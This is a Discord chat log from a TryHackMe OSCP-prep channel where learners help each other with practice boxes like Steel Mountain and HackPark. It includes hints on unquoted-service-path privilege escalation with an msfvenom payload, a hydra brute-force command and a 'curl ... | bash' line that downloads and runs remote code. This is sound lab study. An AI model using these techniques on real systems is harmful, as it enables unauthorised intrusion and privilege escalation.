#offensive-pentesting-path

1 messages · Page 7 of 1

split vector
#

then sessions -i 1 or whatever number session it created.

#

Metasploit is clunky

rancid vine
#

Can someone point me in the right direction on the Steel Mountain powershell command in Task 4? I’ve spent the better part of two hours trying to figure out what the box expects as an answer.

hazy ruin
#

@rancid vine what is the issue ?

rancid vine
#

Honestly? I’m pulling my hair out trying to find the command the question wants.

hazy ruin
#

it's been 3 days i'm stuck on this part #4

#

You mean the question about how to find manually the services ?

final vault
#

I assume it's finding the process command?

#

I was quite cruel with this one

hazy ruin
#

that is actually not that bad

#

i got it right

final vault
#

Thought it would be a nice change for people

hazy ruin
#

@final vault i read some article about the unquoted service path because you told me earlier that I didn't understand the exploit . thank you for that

#

I now have a better understanding of what is actually going on

final vault
#

😄

hazy ruin
#

however .... 🙂

#

when im launching my msfvenom advanced.exe exploit

final vault
#

sc stop

hazy ruin
#

nothing happens

final vault
#

sc start

hazy ruin
#

yes

final vault
#

You stop the process

hazy ruin
#

yes i did

final vault
#

then restart it with the same name I assume?

hazy ruin
#

yes, i restart the process sc start AdvancedSystemCareService9

#

so I pulled my .exe with a powershell -c wget .... commands

#

got my Advanced.exe in the current folder

#

then I stopped the process and started it again

#

but im still on the same user || Bill ||

final vault
#

what directory are you putting advanced in?

rancid vine
#

Yea, the powershell -c

#

I can’t figure out what the correct fill in the blank is to save my life.

hazy ruin
#

i put it in C:\Program Files (x86)\IObit\Advanced System\

final vault
#

nope

#

one directory back

hazy ruin
#

i also tried IObit

final vault
#

because Advanced system isn't quoted

#

so it should be

hazy ruin
#

according to the reading I did

final vault
#

C:\Program Files (x86)\IObit\ "Advanced System"

hazy ruin
#

okay i don't get it

#

you mean I have to put my .exe in

#

\IObit\

#

?

final vault
#

yeah

hazy ruin
#

So i did some reading and I put it then in C:\program files (x86)\IOBIT\

#

when I put it there, and I restarted the service it says that it can't restart the service because the directory or file corruted

final vault
#

because advanced system isn't quoted

#

it will run advanced before it goes into the directory

#

meaning you can take over

hazy ruin
#

okay because indeed the system is trying c:\ first

#

and then c:\program files ... and so on

#

right ?

final vault
#

no

hazy ruin
#

alright, so before going back to reading

#

last thing

#

why when I put my Advanced.exe file to \IObit\ and I restart the service, it tells me that the file or directory is corrupted or unreadable ?

final vault
#

Read up on exploiting unquoted paths and it'll make sense

hazy ruin
#

okay

#

got it, thanks

rancid vine
#

Anywhere I can read up on finding your naughty powershell command? 😜

final vault
#

Just read up on finding processes using powershell

hazy ruin
#

@rancid vine for that question I just google "how to see proceses running powershell command"

rancid vine
#

Yea I imagine I’ve just been looking at it from the wrong perspective. Thanks guys.

hazy ruin
#

yes I think so 🙂

rancid vine
#

I've got nothing. Everything points to get-process which isn't accepted

hazy ruin
#

@rancid vine Google search : powershell command to see service name ,

#

first link

rancid vine
#

I think I must have fat fingered once before or forgot a dash on that one because I have it written down as trying it. Thank you.

hazy ruin
#

it happened to me for a room few weeks ago

#

alright so now you are at the same step as me

#

im struggling quite a lot 🙂 good luck

hazy ruin
#

mann i can't make it work

#

crazy

#

i'm missing a little thing and I don't get it

coral snow
#

@hazy ruin Are you stuck at exploiting the unquoted path?

gritty hollow
#

@coral snow can I dm you for review of my hydra cmd for hackpark please?

hazy ruin
#

@coral snow yeah I'm stuck. I put my advanced.exe file on \IOBit\ folder but I'm missing something because when Im stoping / restarting the service , I got a a message saying " file or directory corrupted and unreadable " . ..

fleet wedge
#

Anyone able to help me with this very annoying flag?

I've terminated and redeployed Alfred 3 times now and got root again 3 times (twice via the intended method and once via just using getsystem on Metasploit) and every time I get to root, there's no root.txt in the expected directory?

#

Nvm I'm a dickhead.

hazy ruin
#

Can I dm someone's who finished the steel mountain please ? 4 days I'm suck at task 4

#

Did some reading on unquoted path exploit but I can't make it work still

coral snow
#

@gritty hollow Yeah sure

#

@hazy ruin can I DM you?

coral snow
#

HackPark, Task 4 question 5. The hint says there is a public writeup on exploit db. I got root without finding any writeup, but the way I identified the service and binary was by entering it into the answer boxes. Could someone tell me (or DM me) the process for finding this write up on exploit db?

rancid vine
#

@hazy ruin did you get sorted out?

hazy ruin
#

@rancid vine yeah finally ..

#

Was good though, through it I learnt a lot of new things

fierce kettle
#

Hi, can anyone PM me on steel mountain ? ( rooted it, but can't find correct answer to question .

quasi heron
#

@fierce kettle it may be happening because the site is under maintanance?

fierce kettle
#

strange ( it looks like me question related , because other questions then these 2 , i can submit correctly)

quasi heron
#

well i cant say surely coz i havent done anything like those

bronze zenith
#

@fierce kettle wait, you can access the website?

fierce kettle
#

yes i can

gritty hollow
#

look closely at the info on the website to provide the answer and not nmap @fierce kettle

fierce kettle
#

can i pm someone directly , so i can send screendump of site directly ?

gritty hollow
#

you can pm me yes

coral snow
#

I find the answers and questions to be distracting, and sometimes they are misleading. Hints and flags should be enough.

gritty hollow
#

agreed - BUT have also pointed out to me that sometimes we enumerate and do not look at all the detail in front of us.

fleet wedge
#

Wondering if anyone can help me with the hydra command for HackPark?

#

Tried command ||hydra -l admin -P /usr/share/wordlists/rockyou.txt http://10.10.144.170/Account/login.aspx http-post-form|| but it's just erroring with error: ||Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-17 11:35:33 [ERROR] Invalid target definition! [ERROR] Either you use "www.example.com module [optional-module-parameters]" *or* you use the "module://www.example.com/optional-module-parameters" syntax!||

ancient locust
#

hello

noble glacier
#

@fleet wedge man hydra or google hydra syntax

fleet wedge
#

oki

ancient locust
#

You guys simple attack, root and capture the flag or you read the task and writup?

#

How you study here actually? I just subscribed yesterday!

coral snow
#

@ancient locust I usually start the room and see what it is about. Then I read up on whichever area I lack sufficient knowledge on.

#

Also interesting to read writeups or talk to other members on how they solved afterwards. Often there are small differences in the approach.

ancient locust
#

@coral snow I see in tasklist tryhackme ask for some answer. Sometime i can't understand the question but i know the answer since i passed the task. Should i really input the answer to track my progress?

#

And you only talk here and i can join to chat somewhere else?

coral snow
#

Pretty new myself, started a couple of days ago. So not sure about other channels of communication (except ones listed under social on the site).

I guess you have to answer the questions to get 100% progress.

ancient locust
#

I can capture the flags but sometime my answer does not match. And i am trying to avoid msf all the way

#

@coral snow Is there any guide in tryhackme?

coral snow
#

guide? Only the tasks I think. You could check the forums as well. People have probably written writeups as well, but those often don't explain the process very nicely.

The flags should be straight forward to just paste into the answer boxes. But I agree that the othen questions and answers can be misleading.

ancient locust
#

I have got two machine but none of them are 100% completed. Because some questions are missleading

jagged stirrup
#

can anyone make skynet room video, am confused at some step 🙂

fierce kettle
#

Question fortryhackme admins , is it allowed /or not allowed to make writeups of tryhackme machines , and publish them on my own site ( if yes do they need to be root.flag restricted or not )

jagged stirrup
#

hide root.flag, it is best thing 🙂

ancient locust
#

Perhaps disclosing last few bytes should not harm

#

"Take a look at the other web server. What file server is running?" A file server could run on same port where the http or https is running?

coral snow
#

@ancient locust That one is a pain, and in my opinion misleading. I can DM you the answer

terse herald
#

We welcome writeups of rooms @fierce kettle (I'm not an admin) but as long as there are no flags and/or passwords within them, you're more then encouraged to submit a writeup from your site 🙂

coral snow
#

You have it correct, but they expect a funky version of it

ancient locust
#

@coral snow What i know is a server use it's own port. 😦 . I might be wrong! It makes me confused

coral snow
#

which question are you struggling with?

#

nvm

#

Can I DM you? Give a hint

ancient locust
#

@coral snow Sure! Check you dm

fierce kettle
ancient locust
#

@fierce kettle puckie is your real name? I want to start a blog. Thinking if "rootpwd" is a good name for my blog or it looks funky

#

🙂

fleet wedge
#

What a beautiful language you have in Netherlands xD

fierce kettle
ancient locust
#

🙂

obtuse scaffold
#

@fleet wedge you turned off DM so I couldn't offer help

#

But the basic gist is that it is an incomplete command

chrome valve
#

@obtuse scaffold please don't try to DM people unless they've given express permission 🙂

maiden vapor
#

anyone else having issues getting Alfred to come online?

chrome valve
#

If you're trying to ping it, chances are that you're running into the windows firewall

#

Which blocks ICMP by default

maiden vapor
#

not pinging

#

just nmap

#

and gobuster

chrome valve
#

nmap pings first unless you use -Pn

#

I have no idea why Gobuster wouldn't be working

#

How's your VPN?

maiden vapor
#

solid

#

I'll perform IT 101

#

and reboot

chrome valve
#

Well, that does the trick 🤷‍♂️ 😁

maiden vapor
#

nope

#

so weird

#

there it goes

#

took forever for some reason

scenic glen
#

Hello boys and girls. I just came up with a question. Is blind SQL injection/mapping part of OSCP? And since you don't have access to SQLmap supposed to build the tools to automate extraction yourself? I just spend 2 days scripting the shape of the DB in lordoftheroot.

ancient locust
#

Anyone of you done HackPark machine?

scenic glen
#

@ancient locust I din couple of weeks ago.

ancient locust
#

@scenic glen Need a little help. May i pm you please?

coral snow
#

Just finished it myself a day or two ago

short jacinth
obtuse scaffold
#

the service name

#
  • .exe
short jacinth
#

punched in everything .exe that seems long enough from ps metasploit

#

nothing comes up

obtuse scaffold
#

Have you already rooted?

short jacinth
#

no but think i have found the admin pw

#

so bad at windows lol

#

recon exploit sug didn't work

obtuse scaffold
#

Think all i used for this box was winPEAS

short jacinth
#

got winPEAS working.

#

reading thought it

#

is there su for windows?

obtuse scaffold
#

you can use powershell to do it

#

the normal way in cmd doesnt work AFAIK

short jacinth
#

there is a way to run commands as another user

#

but no su in cmd makes me sad

obtuse scaffold
#

you definitely can run as another in powershell

#

but i think the intended way that the website tells you to do will be slightly easier than it

#

I can pm you the runas command for powershell if you like

short jacinth
#

I don't know what to do after you get a reverse shell as the web user

#

within metasploit

#

I waited to long. I don't like hackpark

#

bash your head at google just to realize you machine shell died even though the machine is still up

#

AAAAAAHHHHH

obtuse scaffold
#

my shell only died when i was trying out the kernel exploits ^^

#

didnt manage to get any of them to work though

short jacinth
#

It just randomly dies

#

can't reconnect anything

#

without reseting

#

resetting

obtuse scaffold
#

hmm I had the same but thought it was because of my own actions (like messing with servies etc.)

#

maybe its just the box lol

short jacinth
#

@final vault !!!!!

obtuse scaffold
#

here is the powershell command for running commands as another user anyway

#

maybe there is a more elegant way but i dont know it

short jacinth
#

@obtuse scaffold so your saying just create another nc listener as the user you find...

#

really would like to figure out how to priv exec without creds

obtuse scaffold
#

well you open up a shell as the user you are impersonating

#

winPEAS has it i believe

short jacinth
obtuse scaffold
#

study anything in red

#

and google around the stuff in red til it looks like something is there

short jacinth
#

got winPEAS to work

#

@obtuse scaffold is there anyway to do wget like powershell with cmd?

obtuse scaffold
short jacinth
#

or run scripts without installing them like with linux
curl http://lhost:lport/file.exe | bash

#

will check that out

obtuse scaffold
#

this might be what you mean, not sure though

#

Just the first result on google

short jacinth
#

ok ok ok good stuff

#

more reading

obtuse scaffold
#

I dont think anything will block you on these boxes though

#

but you will definitely see it on the harder boxes on htb so good to know about it

final vault
#

why am I being pinged?

short jacinth
#

there are more things I would learn before HTB @obtuse scaffold

#

also the lag of HTB free is making me wait longer to resub again

ancient locust
#

Can i dm someone who escalated HackPark machine or i should post my questions here?

#

need some help

#

hmm, i am being ignored!

short jacinth
#

sorry in a meeting

#

@ancient locust

#

am working on that one to as well

ancient locust
#

ah.... I have shell

short jacinth
#

i have a shell making stuff to get the admin shell

#

will ping you if I solved it

#

to help

ancient locust
#

Thank you

coral snow
#

I have done it, but better you work together, more fun 🙂

short jacinth
#

@coral snow thanks for that wink... jk it's all good

coral snow
#

hehe.. Just saying in case you get completely stuck

ancient locust
#

@coral snow some hints might be fine

short jacinth
#

@coral snow no hints for me I think I know what to do. Well what I want to do

#

@coral snow would like to get a exploit to work though after this method

maiden vapor
#

someone explain my stupidity here

#

in Hackpark, they ask which RCE cve that is used

#

the one I used is "wrong"

coral snow
#

@maiden vapor which one did you use?

maiden vapor
#

2019-6714

coral snow
#

@maiden vapor may I DM you?

maiden vapor
#

yep!

short jacinth
#

@coral snow Ok i give up can i DM you

#

or anyone for HACKPARK

#

help

brittle needle
#

Is anyone else getting constantly timed out trying to connect to smb shares on skynet?

short jacinth
#

@brittle needle for the first part or after you get creds?

#

or just in general?

brittle needle
#

It’s just in general for this room. I already have the creds but the connectivity issues with the room is preventing me from progressing.

ancient locust
#

@short jacinth DId you complete HackPark?

ancient locust
#

tryhackme machine suddenly goes down, some machine does not come only even after 5 minute of start. Time out!

fleet wedge
#

Anyone able to DM me for a bit of help with Hackpark more so getting the Hydra aspect of it working, video tutorials I'm struggling with understanding it so a few questions would be majorly appreciated.

ancient locust
#

@fleet wedge You got hydra working?

fleet wedge
#

that's what I'm trying to figure out @ancient locust cause either I'm doing it wrong or the password lists I've been using are shit.

obtuse scaffold
#

dm me if you need help for hackpark

#

just pm me your command and i'll see whats up with it

fleet wedge
#

i need help with brainpan

short jacinth
#

@ancient locust stuck on the priv exec part

ancient locust
#

@short jacinth the machine always goes down suddenly. Doest it happen for you too?

short jacinth
#

ya

#

it's unstable for some resason

#

did you get your hydra to work?

ancient locust
#

@short jacinth Too unstable. I did not try the hydra anymore. Just used burp. I stopped working for this machine since most of the time it is going down after 20-40 minutes. And i was not able to find the vulnerable service binary. Someone said there is a but i don't see anything interesting

brave bolt
#

which machine? hackpark?

short jacinth
#

UA

#

ya

brave bolt
#

i cant recall it going down by itself

ancient locust
#

yeah

#

So how?

brave bolt
#

there was one room tho that i had to restart as to much enumeration made it return false values for everything

#

but after a terminate&redeploy the enumeration worked if i didnt do it as aggressively

short jacinth
#

@ancient locust trying the brute force part again

ancient locust
#

@short jacinth Try with all post request

short jacinth
#

worked with a shorter list trying with rockyou.txt again

ancient locust
#

try seclist/common-passwords/10k

short jacinth
#

it worked both times

ancient locust
#

Thats good

#

May i see the command? in DM?

short jacinth
#

ya just dm you

#

did you get it?

sonic dirge
#

powershell -c "Get-Service"
@final vault Thanks, was going nuts with this question.

final vault
#

❤️

coral snow
#

Game Zone really should have a no-sqlmap task

#

sqlmap is not allowed in OSCP exam

#

Kind of defeats the point of the room

chrome valve
#

The OSCP rooms are all in the process of being updated to include manual sections 🙂

brave bolt
#

awesome muir 🙂

chrome valve
#

Thank optional 😄

short jacinth
#

what is task 4 question 3 on hackpark no idea what I'm looking for

coral snow
#

@short jacinth Probably what you think, but add ".exe"

fleet wedge
#

This is the last box I need to complete for OSCP learning. Can someone help me on which dictionary to use for “jack”

chrome valve
#

The pre-eminent expert on Jack is away just now I'm afraid

fleet wedge
#

?

noble glacier
#

@fleet wedge The word list you need is installed by default on Kali

violet shore
#

@short jacinth any progress on finding the abnormal service ? I've rooted the box but the service name im putting in there keeps saying wrong answer

#

@fleet wedge check out isroot.nl the article there makes the learning process relatable. Thank me later

fleet wedge
#

@violet shore i have everything i am just stuck at the msfvenom payload

#

I have read some articles

#

Looks like in vulnhub its running on windows

#

Whereas tryhackme runs linux

#

I tried both payloads nothing seems to work

obtuse scaffold
#

not sure why it's down right now http://shell-storm.org/shellcode/

#

but this just has a bunch of shellcode for your bof exploit

fleet wedge
#

ino i got it

#

thanx anyways coaran 🙂

#

privesc was quite easy

#

initial shell took me a while never actually generated one for linux machines most of the times nc , python ,php etc did the trick

stray lynx
#

has anyone complete the manual exploitation of "Steel Mountain"?

obtuse scaffold
#

@fleet wedge were you able to get shell without meterpreter, couldn't get normal reverse_shell payload to stick

#

only worked through meterpreter payload for me

fleet wedge
#

@obtuse scaffold i am in oscp path i dont use meterpreter or metasploit

#

also yes i did it without it

short jacinth
#

@violet shore HackPark I have thrown winPEAS, JAWS, tasklist, schtask, get-process, and Get-ScheduledTask not sure what .exe string I'm looking for

#

feel like for windows manual process enum would be useful

short jacinth
#

oh wow got it... hackpark done

#

reEEEEE

neat socket
#

Is this a good prep for oscp

#

I love the platform so now im ready for a new path

coral snow
#

@neat socket I have done 3 machines. There is a bit much focus on automated tools like metasploit and sqlmap. OSCP is more manual, modification of exploits etc.

That said it certainly gives a taste of the PWK labs, and I am having fun.

alpine peak
#

No one is forcing you to use metasploit and sqlmap

coral snow
#

Nope, but one would lile to follow the room tasks, isn't that part of it? Not saying you cant just ignore the tasks and root it, but it would be nice if the tasks focused more on manually exploiting.

alpine peak
#

If you have to follow the room task to root the box, than you should not be taking the OSCP exam

#

The PWK is also way easier than those boxes (or some of them)

coral snow
#

Then whats the point of the tasks?

alpine peak
#

I didn't make the task so don't ask me

#

I'm just being 100% real about the OSCP exam, and those task should be avoided if you're practicing for the exam

coral snow
#

I'm just weighing in on @Syscoin_long s question. And I agree, I don't like the tasks either. The machines are ok though

alpine peak
#

Certain machines may or may not be based on the very thing you expect from the path

coral snow
#

@alpine peak May I DM you?

alpine peak
#

sure

short jacinth
#

@alpine peak is it Ok to DM you questions about hackpark?

alpine peak
#

Sure

obtuse scaffold
#

Did anyone manage to get the chatserver.exe running locally? been trying to get it to run on a windows vm with no luck, not sure what im missing

alpine peak
#

@obtuse scaffold did you include the dll?

obtuse scaffold
#

Not sure how to, I just have both the files and was trying to run the exe ^_^

fleet wedge
#

Is there anyone who can help me with a nudge for “Jack”?

#

What dictionary do I use

noble glacier
#

@fleet wedge The word-list you need is installed by default on Kali.
Can't tell you which one as that will be a spoiler.

fleet wedge
#

@noble glacier I tried rockyou but it’s going to take 10 hours

chrome valve
#

That, I'm afraid, doesn't hold much incentive for spoiling it 🙂
Everyone has the same challenges -- it's part of the box. We can't just give out spoilers to everyone who asks, now, can we?
The help channels are for helping people to understand things that they haven't quite got yet. Telling you which wordlist to use doesn't really fall into that.

final vault
#

Let’s give a great hint. Use fast track

#

Or whatever it’s called

night spade
#

can someone check what i am doing wrong with Steel Mountain?

#

can i discuss question in puclic or should i try to find someone that can reply directly?

quasi heron
#

@night spade whats the issue you are facing?

night spade
#

it was pretty hard to submit a webserver name, the same for CVE number

#

but end of the day it seems like it matches with metasploit module description

rancid vine
#

Not sure what you mean honestly.

#

I'm going to livestream the box in a couple hours for anyone who wants to see.

night spade
#

so question was:

Take a look at the other web server. What file server is running?
#

first i was trying name from the footer at that index page, then name without version number, name from official web page of that webserver, name from CVE list

#

but at the end it was a name without spaces

#

no, actually it was with spaces

#

but with that vendor or whatever in front

rancid vine
#

I mean, this one is fairly straight forward. You can search the name of the web server and it tells you exactly what it is. Typing it in exactly as it is in Google shows the specific exploit you'll use.

night spade
#

of course, i had to use title from exploit-db

upper parrot
#

am i blind? Take a look at the CanRestart option i dont see anything related to that

upper parrot
#

fixed it. haad to redownload script and reupload

upper parrot
#

is there a reason why the root shell dies instantly for steelmountain using metasploit?

rancid vine
#

Never had that issue.

upper parrot
#

for some reason even after i extend the machine by an hour, as soon as it hits 58 mins, it dies

#

it was at 1.5 hours, just hit 58 mins and connection died

upper parrot
#

can someone give me a tip on winpeas? it just hangs in the terminal and doesnt do anything

rancid vine
#

Hangs how? Like you run it and it doesn't fire off?

upper parrot
#

yea

#

ill have to go back to it at some point and check it again. i tried the obfusated and reg ones

#

ended up having to back out of the shell and try again

plucky jewel
#

hey

#

hey

#

i have a probelm getting the exploit to work on steele mountain and it says complete but no session was made. Has anyone experience this?

toxic spear
#

You have to cuss at it

#

Don't let it smell fear or it will fail

#

It senses it

#

@plucky jewel

silent bay
#

Hey! Sparkle are you having the same problem with Steel Mountain [task 2] using Metasploit to access the Machine???

#

I've trying all day trying to gain access

fleet wedge
#

z

upper parrot
#

only issue i had with steelmountain was winpeas

little frost
#

How could I find out how the meterpreter upload function works?

#

Like the actual code behind it.

timid crow
#

Is there a trick to saving burpsuite results to a text file to use with sqlmap? It keeps telling me its an invalid format of a request file

#

This is for the gamezone room

gloomy compass
#

i find just copy and pasting the text maually into a file.req works best. and then removing all the empty lines except one seperating params

#

works best for me

timid crow
#

Removing the spaces seemed to do the trick thanks a ton

hazy ruin
#

Whatever the wordlist I'm using, I'm getting this 16 valid password found

#

Message

hazy ruin
#

Okay I think I'm on to something hold on ...

#

Lol

hazy ruin
#

Finally got it!

#

took me 5h ...

#

🙂

toxic night
#

hello, Anybody did exploit with metasploit on GameZone?

#

It is Task-6, I failed to create a session on metaasploit.

final vault
#

Or you know

#

Answer them yourself. If you’ve rooted stop being lazy, run the script and find the answers...

timid crow
#

I'm having the same issue bbakbbak2, I cant seem to find any manual exploit examples on the internet

#

The issue seems to be with the authentication, its a little fucky because of needing to use an ssh tunnel to reach the webmin panel in the first place im sure

timid crow
#

Okay slight progress, if you set the ssl option to false it tells me it authenticates successfully and creates a meterpreter session but it instantly background it and if I try to go to the session it dies

#

Guess its time to do the metasploit room :b

#

see if that helps

undone sparrow
#

anyone know how i can change the administrator password for the admin account where it's current password is expired from a lower priv account. Where i have the current password

#

(for the expired admin)

#

commandline ideally

#

done it 🙂

exotic orchid
#

Hello people, I have a problem with Brainstorm.
I have created the exploit in my Windows XP VM and it worked perfectly. When I launched it into the Brainstorm machine it was not working.
After doing some research, I checked the writeup and realized that the user of the writeup was sending 1002 letters A to get to EIP, in my case, I was sending 6102 A
Do you know why the offset is different?
With 1002 it worked perfectly
Thanks in advance, I await your response

#

Do I have to use a Microsoft Windows 7 Ultimate VM?

rancid vine
#

Would anyone be interested in a live stream of something like Steel Mountain? I know I see folks having trouble with it.

twilit valve
#

is there a better wordlist for use with gobuster on the first task? gobuster seems to be taking forever

simple loom
#

@twilit valve I usually start with this list and use 100 threads gobuster dir -u (target)/ -wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

toxic night
#

@timid crow you're right. but i want to know what problom is... it will make me crazy if i come across the same situation.😫

#

i wish the man who solved the room appears

fierce kettle
#

Question on hackpark What is the name of the abnormal service running? can't figure out the correct question ( i know it's C:\Program Files (x86)\SystemScheduler> and M***.exe is the next question)

simple loom
#

@fierce kettle if you have a shell couldn’t you just go to that directory and look?

fierce kettle
#

I have now thanks it was , W**********.exe ( it was case sensitive the answer )

#

@simple loom may i pm you for a question Using winPeas, what was the Original Install time? (is this for the dir or the W.exe file and need the , in the accepted answer ?)

cloud flicker
#

I had issue with that Q, try 'systeminfo' in a standard cmd shell

fierce kettle
#

@cosminthrill amazing thanks , if you need info an any htb machine, you may pm me, i can help you 👍

cloud flicker
#

@fierce kettle you're most welcome. An extra challenge in some rooms is trying to find the exact answer format! 😉

cloud flicker
#

Does anyone have any recommended resources that might explain how to exploit SQL injection manually? I am working through Game Zone and can use SQLMap tool easily but I don't understand how it is working

noble glacier
#

@cloud flicker Try using sqlmap with burp suite.

gloomy compass
#

you can intercept sqlmap with burp?

cloud flicker
#

sqlmap <whatever> --proxy=http://127.0.0.1:8080

(it looks like there's some add-on but I just wanted to look fast, hahah)

gloomy compass
#

oh that makes sense, nice!

ancient locust
#

anyone did the bof machine?

#

The brainstorm?

#

no one talk

timid crow
#

tackling it now rootpwd, ill let you know how it goes

ancient locust
#

@timid crow I got the root

#

But i can't answer a question

#

how many ports are open

bronze zenith
#

@ancient locust scan the machine with nmap to see that

ancient locust
#

@bronze zenith Yep.... Did it , and it always say wrong

bronze zenith
#

did you scan all of them

ancient locust
#

I counted how many ports are open.... if 3 ports open i answered 3

#

yes

#

and it always say 'wrong'

#

@bronze zenith Can you please check it?

bronze zenith
#

@ancient locust what room is that

ancient locust
#

Brainstorm

bronze zenith
#

okay i'll check it

ancient locust
#

nmap command: nmap -v -p- -T4 -Pn ip

coral snow
#

Daily Bugle.. I am getting rev shell as apache. Any vague hints on pivoting?

ancient locust
#

Try linpeas

bronze zenith
#

nmap command: nmap -v -p- -T4 -Pn ip
@ancient locust but that's not all the ports

#

i am checking wait a bit

ancient locust
#

I am scanning again... But this time, it is too slow

bronze zenith
#

@ancient locust idk i also got 3

#

and the writeup only talks about 3 too

ancient locust
#

@bronze zenith So there is something wrong with test of the answer

bronze zenith
#

but it's a medium level room

ancient locust
#

I got root flag

bronze zenith
#

maybe there's another way

ancient locust
#

this box supposed to be realistic since it is listed in oscp learning path. I don't think the port is hidden.

#

@bronze zenith Guessing worked! And the answer practically totally wrong

bronze zenith
#

yeah i guess

coral snow
#

@ancient locust That did it, thanks. Was not aware of linpeas

ancient locust
#

@coral snow 🙂 . Got the root too?

rancid vine
#

||is it intended to use migrate to privesc in Jenkins?||

coral snow
#

@ancient locust More or less, know the route 🙂

ancient locust
#

@coral snow these machine are easier than hackpark,vulnersity

coral snow
#

@ancient locust Vulnersity is part of oscp path?

ancient locust
#

@coral snow Yes

#

as easy machine

coral snow
#

but daily bugle is easier than Vulnersity?

#

and Vulnersity is easy, so daily bugle is... super easy?

#

@ancient locust It is rated hard, though

ancient locust
#

Buffer overflow machine is more easy

#

I am still struggling with hackpark

#

These questions and answer killing me lol. I was able to exploit with a CVE listed vulnerability and here it say, my ans is wrong

#

apt-get install python-pip

#

No package in Kali?

cloud flicker
#

On the GameZone machine Task5 says it is possible to confirm that a service is blocked by the machine#s firewall using iptables but when running iptables -L I get a permission denied error.

coral snow
#

@ancient locust Aaaaand rooted, thanks! 🙂

ancient locust
#

congrats

timid crow
#

@rancid vine yes

ancient locust
#

giving up working with hackpark. Very unstable machine

#

😦

#

This machine don't like me at all

cloud flicker
#

@ancient locust I'm unable to complete it too, I think it is bugged to where it dies after an hour even if you extend the time. Just becomes totally unresponsive. I think admins are looking into it

ancient locust
#

@cloud flicker I tried with vulnerablesity, when i fuzzed the file it become unresponsive

cloud flicker
#

I've tried multiple times at different speeds and it seems to just die after a certain amount of time as opposed to any specific activity

rancid vine
#

So it's not just me then. That's good.

brittle needle
#

Yeah I’m having trouble complete hackpark due to the instability

upper parrot
#

whats up with hackpark? im on the priv esc part atm

#

oh the time extension..yea its extremely annoying lol

upper parrot
#

anyone having issues with windows exploit suggestor? i update the database, updated xlrd and both show its been updated. then the script says please update lol

undone jacinth
#

oh man i feel so stupid haha.. just spent like 45 minutes on DailyBugle ||as the wrong user for priv esc||

coral snow
#

@undone jacinth May I DM you?

night spade
#

maybe someone can give me hint to task 4 second question at "Steel Mountain" room? There is a question about powershell command.

timid crow
#

I had some issue with that myself @night spade try googling "powershell commands to show running services" and doing a little reading. The first part of the answer is already there for you in the question 🙂

#

Feel free to pm me if you are still lost

night spade
#

ooh, got it, thanks

lapis rivet
#

hello

timid crow
#

Having trouble getting started on Brainstorm, can't seem to get ftp to play nice for some reason

#

Been bashing my head against the wall on this one and Im sure its super simple any help is appreciated

obtuse scaffold
#

I'm pretty sure you should just be able to search the filesystem on ftp

#

maybe try reset

brittle needle
#

I'm stuck trying to transfer the reverse shell into hackpark. I've tried three different ways of doing it.

hazy ruin
#

@brittle needle im at the same step. did you try uploading the exploit through the same process as the first one ?

timid crow
#

@brittle needle @hazy ruin ||think about how an authenticated user could upload things onto a blog page, like updating an image on an existing post or on a new post||

hazy ruin
#

I did it, it worked yay 🙂

#

MSF is quite clunky tho, I was doing the same yesterday night, and I was struggling to get my listener from MSF

timid crow
#

Yeah msf is a bit iffy on this box, I actually did manual only on this box. Better for oscp prep that way anyways :b

hazy ruin
#

yeah I should do that next time

timid crow
#

I take my test tuesday, probs wont pass the first try but Im looking forward to seeing what the exam is like and getting a shell or two 🙂

hazy ruin
#

btw im currently tyring to privesc on the machine ( hackpark )

#

Can I use the command wmic ................... . . . .

#

or is it only for unquoted path purposes ?

timid crow
#

I didnt use that one personally

#

you're on the right track with unqouted path though

hazy ruin
#

okay

crude shale
#

Hi, i need help for authenticating blogengine

#

Same like hackpark

#

Password is breaked, but when entering it is showing something like ‘oops, developer caused this issue, appolgies, 20lashes to him vlah blah’

#

Is anyone can helped me regarding this

timid crow
#

which room @crude shale ?

hazy ruin
#

I'm still stuck at hackpark question task#4. I found the abnormal service || WindowsScheduler || however I was pretty sure that I need to exploit something with || WSservice.exe || however it is not the right answer. I launched some other scripts I have and all are pointing to the same .exe . where should I look at ?

#

I mean, the hint is talking about || log files || , I checked it from || c:\program files (x86)\SystemScheduler\logfile.txt and logfileadvanced.txt || but didnt find anything special

timid crow
#

@hazy ruin you're on the right path with the idea of scheduling. Take a look at running processes using "tasklist" several times. do you notice any programs that runs every minute or so?

hazy ruin
#

Thanks, just did tasklist, how do I know how often a task is running ?

#

You said " to run it several times" okay got it

#

thank you,

#

Got it right now

#

yay 🙂

fleet wedge
#

just look at time logs @hazy ruin

timid crow
#

logs too ^

#

and happy to help 🙂

hazy ruin
#

Found it I'm good now 👍

fleet wedge
#

Why do I get authentication error when doing ||smb||map in Skynet?

timid crow
#

I had similar issues @fleet wedge

#

I had issues using smbclient as well

night spade
#

but there is no way to get abnormal service name for third question in process list, right?

bronze zenith
#

for HackPark? @night spade

night spade
#

yes

#

because i was not able to get the exe from process list and i just listed services

bronze zenith
#

I mean.. it's intended to use WinPeas

night spade
#

and then just added .exe to the name running

bronze zenith
#

yeah you are supposed to add exe

#

processes are usually displayed without an extension

#

just a name

night spade
#

but as I understand that is just a service name, process have a different name which can be seen in process list

#

am I wrong and there actually is that {servicename}.exe somewhere?

bronze zenith
#

you need a service yes

#

you can rather list processes or run WinPeas (which is better)

fleet wedge
#

Yes, you should use winpeas

#

also the next task asks you to use it

#

@timid crow how'd you fix it?

fleet wedge
#

May someone help me in Skynet, I actually don't know how to upload the shell :/, kinda don't understand what the exploit description says, went trough passwd and configuration.php but, what else?

stray lynx
#

are there any video demonstrating buffer overflows room?

#

im a bit of a n00b wit this...

fleet wedge
#

I'm going through a bufferoverflow right now in cod caper

#

it's very descriptive and helpful, this is my first time trying a bof

stray lynx
#

Trying to do buffer overflow room

stable geode
#

Cod caper has buffer overflow?

fleet wedge
#

Yes @stable geode

#

As the person who made the room

stable geode
#

I'm gonna do it today, woot!

fleet wedge
#

I can comfortably say it does

stable geode
#

You should've told me that before :(

fleet wedge
#

I told you I'm the creator of like half this sites RE content

#

Which is pretty sad tbh

stable geode
#

Why?

fleet wedge
#

Because there's not enough re content

stable geode
#

True that.

fleet wedge
#

Robin this is your area

stable geode
#

My room is 90% complete though.

fleet wedge
#

Make some rooms!

stable geode
#

Yeah, surely will.

lusty epoch
#

hey guys, sat the OSCP yday. anyone sat it recently? what are the turn around times on exam results with 'rona?

bronze zenith
#

no idea on results but one of our members is doing an exam right now

fleet wedge
#

